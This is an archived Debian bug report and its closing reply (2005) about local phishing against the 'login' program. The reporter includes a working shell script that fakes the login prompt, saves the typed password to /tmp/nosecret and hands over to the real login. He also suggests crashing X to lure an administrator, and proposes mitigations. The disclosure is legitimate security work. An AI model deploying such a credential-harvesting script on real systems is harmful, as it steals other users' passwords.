[Pkg-shadow-devel] Bug#305600: marked as done (login is vulnerable to local pishing attacks)
Debian Bug Tracking System
owner@bugs.debian.org
Wed, 20 Apr 2005 23:18:19 -0700
Your message dated Thu, 21 Apr 2005 07:17:05 +0200
with message-id <20050421051705.GL7188@mykerinos.kheops.frmug.org>
and subject line [Pkg-shadow-devel] Bug#305600: login is vulnerable to local pishing attacks
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 21 Apr 2005 00:33:48 +0000
>From gps@mittelerde.physik.uni-konstanz.de Wed Apr 20 17:33:47 2005
Return-path: <gps@mittelerde.physik.uni-konstanz.de>
Received: from honk1.physik.uni-konstanz.de [134.34.140.224]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DOPdW-0005F6-00; Wed, 20 Apr 2005 17:33:42 -0700
Received: from localhost (localhost.localnet [127.0.0.1])
by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 6C2F92BC43
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:40 +0200 (CEST)
Received: from honk1.physik.uni-konstanz.de ([127.0.0.1])
by localhost (honk [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
id 08967-14 for <submit@bugs.debian.org>;
Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from gandalf.physik.uni-konstanz.de (gandalf.physik.uni-konstanz.de [134.34.140.5])
(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
(No client certificate requested)
by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 26F282BC39
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from bilbo.physik.uni-konstanz.de (bilbo.physik.uni-konstanz.de [134.34.140.32])
by gandalf.physik.uni-konstanz.de (Postfix) with ESMTP id B997CC
for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:35 +0200 (CEST)
Received: from gps by bilbo.physik.uni-konstanz.de with local (Exim 3.35 #1 (Debian))
id 1DOPdP-0003Qg-00; Thu, 21 Apr 2005 02:33:35 +0200
Date: Thu, 21 Apr 2005 02:33:35 +0200
From: Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: login is vulnerable to local pishing attacks
Message-ID: <20050421003335.GA13179@bilbo>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Reportbug-Version: 3.8
User-Agent: Mutt/1.5.6+20040907i
Sender: Gerhard Schrenk <gps@bilbo.physik.uni-konstanz.de>
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at honk.physik.uni-konstanz.de
Delivered-To: submit@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Package: login
Version: 1:4.0.3-30.7
Severity: important
Tags: security
Every local user can simply start a little program that imitates login and
grabs the password pretending it's wrong. It's really hard for the average user
to spot the difference and to make sure that he really didn't mistype the
password. Most users have no read access to /var/log/auth.log and thus cannot
check afterwards. If the attacker crashes X so that it doesn't restart
(unreproducible but quite easy for users who have reached their quota limit...)
and disable ssh (pulling of the network cable) you have good chances to get the
password of your local admin/root.
Proof of concept:
#!/bin/sh
# start with exec ./scriptname
trap '' INT TSTP
clear
echo
echo "Debian GNU/Linux 3.1 medusa tty1"
echo
read -p "medusa login: " user
stty -echo
read -p "Password: " nosecret
stty echo
echo
echo $nosecret > /tmp/nosecret
sleep 3
echo "Login incorrect"
echo
exec login
IMHO the easiast security enhancement for password based local
authentication seems to be (anyone better ideas?) keysequences that can
only be catched by the kernel or apps that are suid root.
For example one can put the line
kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
in /etc/inittab. Then one *can* "zap" every time to respawn getty and
login.
In a multiuser (lab-)environment it would be desirable if the admin
could enforce such a safe keysequence before getty/login starts. I have
played with 'getty -t' and/or s/respawn/once/ in /etc/inittab but yet
not found a satisfying solution.
The best solution I found was to spawn the getty with an timeout, e.g.
3:23:respawn:/sbin/getty -t 60 38400 tty3
and to patch the default getty (agetty.c in util-linux) with an additional
signal-handler for SIGALRM. Now the user *must* first kill the outimed getty
with the safe(?) kbrequest. Quick 'n dirty idea:
sa.sa_handler = sigalrm_handler;
sigaction (SIGALRM, &sa, NULL);
...
static void sigalrm_handler(int sig) {
sigset_t nset;
raise(SIGSTOP);
}
Since I don't yet know the *right* debian default solution I open
this bug against login.
-- Gerhard
-- System Information:
Debian Release: 3.1
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.11.6-clients
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Versions of packages login depends on:
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an
ii libpam-modules 0.76-22 Pluggable Authentication Modules f
ii libpam-runtime 0.76-22 Runtime support for the PAM librar
ii libpam0g 0.76-22 Pluggable Authentication Modules l
-- no debconf information
---------------------------------------
Received: (at 305600-done) by bugs.debian.org; 21 Apr 2005 06:14:18 +0000
>From bubulle@kheops.frmug.org Wed Apr 20 23:14:18 2005
Return-path: <bubulle@kheops.frmug.org>
Received: from onera.onera.fr [144.204.65.4]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DOUx7-0001iW-00; Wed, 20 Apr 2005 23:14:17 -0700
Received: from cc-mykerinos.onera (localhost [127.0.0.1])
by onera.onera.fr with ESMTP id j3L6ECrI027455;
Thu, 21 Apr 2005 08:14:15 +0200 (MEST)
Received: by mykerinos.kheops.frmug.org (Postfix, from userid 7426)
id CF3592329B; Thu, 21 Apr 2005 07:17:05 +0200 (CEST)
Date: Thu, 21 Apr 2005 07:17:05 +0200
From: Christian Perrier <bubulle@debian.org>
To: Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>,
305600-done@bugs.debian.org
Cc: team@security.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#305600: login is vulnerable to local pishing attacks
Message-ID: <20050421051705.GL7188@mykerinos.kheops.frmug.org>
References: <20050421003335.GA13179@bilbo>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050421003335.GA13179@bilbo>
User-Agent: Mutt/1.5.9i
Delivered-To: 305600-done@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Quoting Gerhard Schrenk (gps@mittelerde.physik.uni-konstanz.de):
> Package: login
> Version: 1:4.0.3-30.7
> Severity: important
> Tags: security
>
> Every local user can simply start a little program that imitates login and
Well, as Tomasz (shadow upstream author) mentioned, this can be told
about any program which inputs users with a password.
And I would add that, if your system allows random users to replace
login by such a program, then you have much other problems than
phising.
So, really sorry, but I absolutely don't see what the shadow package
maintainers can do with this bug reports, except closing it.
My understanding of Matt's answer, in name of the Debian security
team, is that the only way to try avoiding this is a special call in
the system for "secured input" or whatever you want to name it, which
coul dthen be used by programs needing it. But, well, in such cases,
what would prevent the people who can replace login because they
compromised a system to write their own such program using these
calls.
This is a non issue, sorry.